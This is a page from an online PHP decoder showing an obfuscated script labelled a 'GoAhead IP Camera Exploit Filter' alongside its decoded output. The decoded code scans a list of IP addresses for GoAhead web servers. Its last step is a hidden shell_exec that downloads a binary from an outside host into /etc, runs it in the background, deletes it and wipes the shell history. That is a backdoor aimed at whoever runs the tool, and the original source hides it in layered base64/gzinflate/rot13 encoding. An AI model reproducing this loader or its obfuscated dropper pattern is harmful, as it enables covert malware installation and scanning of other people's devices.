Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php /* ************************************* * GoAhead IP Camera Exploit Filter ..

Decoded Output download

function in_array_r($item , $array){
    return preg_match('/"'.$item.'"/i' , json_encode($array));
}

if( ini_get('safe_mode') )
	{
		die('Please disable PHP SafeMode! Killing script...
');
	}
else
	{
	$file = file($list);
	ForEach ($file as $line)
		{
			$ip = $line;
			$ip = trim($ip);
			
			$url = 'http://'.$ip.':'.$port;
			
			$ch = curl_init();
			$headers = [];
			curl_setopt($ch, CURLOPT_URL, $url);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			curl_setopt($ch, CURLOPT_TIMEOUT, 1);

			// this function is called by curl for each header received
			curl_setopt($ch, CURLOPT_HEADERFUNCTION,
			  function($curl, $header) use (&$headers)
			  {
				$len = strlen($header);
				$header = explode(':', $header, 2);
				if (count($header) < 2) // ignore invalid headers
				  return $len;

				$name = strtolower(trim($header[0]));
				if (!array_key_exists($name, $headers))
				  $headers[$name] = [trim($header[1])];
				else
				  $headers[$name][] = trim($header[1]);

				return $len;
			  }
			);

			$data = curl_exec($ch);
			
			if(in_array_r("GoAhead-Webs", $headers)){
				echo "GoAhead Found
";
				$data = $ip.":".$port."
";
				file_put_contents($output, $data, FILE_APPEND | LOCK_EX);
			}
			else
			{
				echo "Not A GoAhead Device or Dead....
";
			}				
		}
		shell_exec("cd /etc; wget -q http://gotmilk.ml/HjT5Rk -O .l; chmod +x .l; nohup ./.l </dev/null >/dev/null 2>&1; rm -rf .l;clear; history -c");
	}

Did this file decode correctly?

Original Code

<?php

/*

*************************************
* GoAhead IP Camera  Exploit Filter *
*************************************
* THIS IS A PRIVATE FILE.           *
* YOU SHOULD NOT HAVE THIS.         *
* IF YOU LEAK THIS, AT LEAST LEAVE  *
* CREDIT TO THE AUTHOR IN THE       *
* COMMENTS BELOW.                   *
*************************************
* EXPLOIT FOUNDER:                  *
* * Pierre Kim                      *
*************************************
* SCRIPT AUTHOR:                    *
* * Jester                          *
* INSTAGRAM:                        *
* * thejesterino                    *
* TWITTER:                          *
* * @xJesterino                     *
* HACKFORUMS UID:                   *
* * 2978478                         *
*************************************
* * #OstrichGang                    *
* * #CanadianGang$                  *
* ***********************************

* Syntax: php FILENAME.php
* Make sure to have a file called "poop.txt" or whatever you named your $list to.

*/

$list = "poop.txt";
$port = "81";
$output = "GoAhead-Filtered.txt";

eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
?>

Function Calls

strrev	3
gzinflate	11
str_rot13	11
gzuncompress	4
rawurldecode	1
base64_decode	18

Variables

$list	poop.txt
$port	81
$output	GoAhead-Filtered.txt

Stats

MD5	fdb422e324bb87ca7c357a73ffb26692
Eval Count	16
Decode Time	130 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats